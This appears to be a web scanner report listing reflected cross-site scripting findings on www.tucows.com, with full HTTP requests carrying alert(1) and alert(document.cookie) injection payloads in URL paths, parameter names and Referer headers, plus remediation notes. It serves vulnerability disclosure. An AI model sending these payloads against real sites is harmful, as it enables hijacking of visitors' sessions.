HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:55 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82496"-alert(1)-"c8a91aceec7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets82496"-alert(1)-"c8a91aceec7/sitemap.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:13 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload caf6a"-alert(1)-"44f43ba9b50 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/sitemap.htmlcaf6a"-alert(1)-"44f43ba9b50 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:25 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.104. http://www.tucows.com/images/newassets/sitemap.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/sitemap.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 220eb"-alert(1)-"e4076721429 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/sitemap.html?220eb"-alert(1)-"e4076721429=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:30 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33aa5"-alert(1)-"59cc111f4af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images33aa5"-alert(1)-"59cc111f4af/newassets/terms.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:06 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b47ad"-alert(1)-"799fe703e28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetsb47ad"-alert(1)-"799fe703e28/terms.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:18 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 102d4"-alert(1)-"f3c9b91e18e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/terms.html102d4"-alert(1)-"f3c9b91e18e HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:37 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.108. http://www.tucows.com/images/newassets/terms.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/terms.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eabf"-alert(1)-"20d1d0ffbba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/terms.html?5eabf"-alert(1)-"20d1d0ffbba=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:38 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae2fb"-alert(1)-"6d8934a62dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includesae2fb"-alert(1)-"6d8934a62dd/corpbar/cb3.0/css/style.css HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:37 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31900
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f85d"-alert(1)-"109c256849a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/corpbar3f85d"-alert(1)-"109c256849a/cb3.0/css/style.css HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32593
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b6fb"-alert(1)-"fc67c6d109f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/corpbar/cb3.01b6fb"-alert(1)-"fc67c6d109f/css/style.css HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:22:56 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32620
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45e8b"-alert(1)-"4bed83e5cce was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/corpbar/cb3.0/css45e8b"-alert(1)-"4bed83e5cce/style.css HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:23:05 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 33078
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1a29"-alert(1)-"d118442f3f9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/corpbar/cb3.0/css/style.csse1a29"-alert(1)-"d118442f3f9 HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:23:14 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32137
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
